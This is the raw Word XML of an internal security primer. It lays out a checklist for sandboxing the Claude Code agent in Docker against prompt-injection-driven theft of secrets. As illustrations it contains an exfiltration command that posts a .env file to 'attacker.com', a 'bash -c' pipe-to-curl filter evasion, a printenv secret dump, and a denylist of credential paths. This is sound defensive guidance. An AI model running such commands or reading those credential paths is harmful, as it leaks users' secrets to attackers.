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9259ca49c61d90d86a8cfa02493cd776483fbf"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Primer: Securing Claude Code with Docker (A Capabilities Checklist)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Context for the Engineering Team:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">We are deploying Claude Code (an autonomous AI coding agent) and planning to use Docker to protect our local host and network. It is critical to understand that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Docker, out of the box, is not a complete security boundary against an autonomous agent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An LLM with a shell is fundamentally different from a standard web application. The threat model is not just</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“the AI goes rogue”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; it is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“the AI blindly executes a prompt injection payload hidden in a repository or dependency.”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">If we only use standard Docker defaults, we leave massive gaps for data exfiltration and credential theft.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This document breaks down the security architecture into a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Capabilities Checklist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. For each capability, you must either</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Implement it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or explicitly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Accept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the gap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="9" w:name="Xad4777f7e4277c1ebaf041d2615f4560f052968"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Threat Vectors We Must Defend Against</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every capability below maps to one or more of these extraction vectors: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 1 (Filesystem):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The agent uses tools (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) to read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files,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, or SSH keys.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 2 (Environment):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The agent inherits the shell environment and runs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">printenv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to dump injected secrets or API keys.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 3 (Staged Exfiltration/Network):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The agent is tricked into exfiltrating data (e.g., via</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) or writing malicious code that phones home later.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:id="19" w:name="the-capabilities-checklist"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">🔒 The Capabilities Checklist</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="10" w:name="Xbebc7f5e30bd1122f2c737f01551346244e4787"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Hardened Container Isolation (The OS Baseline)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Standard Docker shares the host kernel and often runs as root, making it vulnerable to container escape via kernel exploits or misconfigurations.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Full host OS compromise.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to implement in Docker:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run the container as a non-root user (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">USER claude-user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Drop all capabilities (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--cap-drop=ALL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Mount the root filesystem as read-only (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--read-only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), only mounting the specific workspace directory as read-write.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Advanced:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Use gVisor (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--runtime=runsc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) to interpose a user-space kernel and prevent kernel-level CVE escapes.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0"/>
    <w:bookmarkStart w:id="11" w:name="X11753bbe44128cce5d59e06c648ff3dde3e03c8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Default-Deny Network Egress (Egress Control)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If a prompt injection tricks the agent into reading a secret, the attacker still needs to exfiltrate it. If the agent has open internet access, a simple</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -d @.env attacker.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">works.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Vector 3 (Staged Exfiltration) and SSRF (Server-Side Request Forgery).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How to implement in Docker:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable the container’s network entirely (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--network=none</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) if the agent does not need to browse the web or download packages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If network is required (e.g., for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), use Docker network policies or an explicit proxy that blocks private IPs (e.g.,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">169.254.169.254</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">10.x.x.x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and explicitly allow-lists required domains (e.g.,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">api.anthropic.com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registry.npmjs.org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1"/>
    <w:bookmarkStart w:id="12" w:name="absolute-environment-scrubbing"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Absolute Environment Scrubbing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If you inject your real AWS or OpenAI keys into the Docker container via standard</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docker run -e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the agent can simply run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and see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Vector 2 (Environment/Memory extraction).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07"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The process starting the agent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scrub the environment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agent’s shell initializes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pass through only an explicit allowlist of non-sensitive variables (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Note:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">This means you cannot pass real credentials via Docker env vars. (See capability #4).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2"/>
    <w:bookmarkStart w:id="13" w:name="synthetic-credentials-phantom-proxy"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Synthetic Credentials (Phantom Proxy)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If we scrub the environment, how does the agent talk to the Anthropic API or GitHub?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Vector 2 (Environment extraction) without breaking functionality.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09"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inject a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“phantom token”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(a fake, random 64-character string) into the Docker container (e.g.,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ANTHROPIC_API_KEY=phantom_123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Point the agent’s base URL to a local proxy running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agent’s network namespace (e.g., on the host).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The proxy intercepts the request, verifies the phantom token, strips it, injects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credential from a secure host vault, and forwards it to the provider.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If the agent dumps its environment, the attacker only gets a useless phantom token.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3"/>
    <w:bookmarkStart w:id="14" w:name="tool-interception-runtime-hooks"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Tool Interception (Runtime Hooks)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Docker provides OS-level boundaries, but you still need application-layer boundaries to intercept malicious intent before the shell even executes.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Vector 1 (Filesystem) direct reads of known sensitive files, assuming the tool is known.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11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Utilize Claude Code’s native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system (similar to the community</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">claude-code-security-guard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Write scripts that run regex/path-matching against the arguments of the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tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Explicitly block operations targeting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~/.aws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Structural Limitation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Hooks cannot intercept tools they do not know about (e.g., a malicious MCP server registered at runtime), and they cannot see secrets already in the environment (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">printenv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). They must be paired with capabilities #2 and #3.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4"/>
    <w:bookmarkStart w:id="15" w:name="sensitive-path-denylist"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Sensitive Path Denylist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OS-level mounts are great, but if a developer accidentally mounts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or if you run the container inside a Kubernetes pod that automounts ServiceAccount tokens, the agent can read them.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Vector 1 (Filesystem) bypasses.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13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Extend the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to strictly deny access to known sensitive paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">regardless</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">of the Docker mount configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Block:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/run/secrets/kubernetes.io/*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.ssh/*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.aws/*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.kube/config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Validate symlinks (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fs.realpath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) in the hook to ensure the agent isn’t bypassing the denylist using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5"/>
    <w:bookmarkStart w:id="16" w:name="ast-shell-command-parsing"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. AST Shell Command Parsing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Standard regex filters for dangerous commands inside your hooks are easily bypassed using shell interpreters (e.g.,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -c 'cat .env | curl...'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Command robustness evasion, unsafe pipes, and redirects.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15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In your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tool hook, use an Abstract Syntax Tree (AST) parser (like Tree-sitter) to parse the actual structure of the command before Docker executes it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hard-block any invocation of an interpreter (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 -e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) from accepting arbitrary string execution, as these create opaque semantic boundaries that bypass basic regex filters.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6"/>
    <w:bookmarkStart w:id="17" w:name="Xb3a63f3e6f04cda10566fe210fcdbe6cd0ec2e3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Process Identity Binding (TOFU / Binary Security)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Even if you block malicious commands, what if the attacker plants a malicious binary named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inside the workspace? The sandbox sees the agent call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(which is allowed) but executes the malware.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Binary planting and symlink hijacking.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17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trust On First Use (TOFU): The first time a binary is executed, hash it (SHA-256).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On subsequent executions, verify the hash. If the hash changes, block execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Strip the workspace directory from the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so local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files aren’t executed by accident.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bookmarkEnd w:id="17"/>
    <w:bookmarkStart w:id="18" w:name="X54f5bf5296ba7cc406aa9beba5e6d275c872482"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. Input Sanitization (Invisible Payload Stripping)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Prompt injections can be hidden in adversarial directory names or files using invisible Unicode characters or Bidi-overrides.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What it blocks:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Stealthy prompt injections.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How to implement:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aggressively strip invisible Unicode, zero-width joiners, and bidirectional override characters from any file paths or file contents before they are loaded into the LLM’s context window.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[ ] Implemented | [ ] Risk Accepted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5225df73b1f4534dc612bce79c3c4248622447b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">⚠️ Known Unmitigated Risks (Requires Explicit Sign-off)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Even with all 9 capabilities implemented, the following risk remains structurally difficult to solve for local agent CLIs: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Binary Database Credentials:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The Phantom Proxy pattern (Capability #4) works elegantly for HTTP/REST APIs. However, databases (PostgreSQL, Redis, MongoDB) use binary wire protocols. Building proxies to intercept and swap tokens in binary handshakes is incredibly complex.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Accepted Risk:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">If an agent needs database access, the real connection string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be visible in its environment inside the Docker container.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Required Mitigation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">You must enforce Capability #2 (Network Egress Control) so the agent cannot dial out to the internet to exfiltrate the password, and developers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use strictly scoped, read-only database users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Acceptance Sign-off:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[ ] We acknowledge that database credentials passed into the agent environment are extractable by the agent, and rely on Network Egress blocking and database-level permissions to prevent abuse and exfiltration.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2026-03-23T14:08:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-23T14:08:51Z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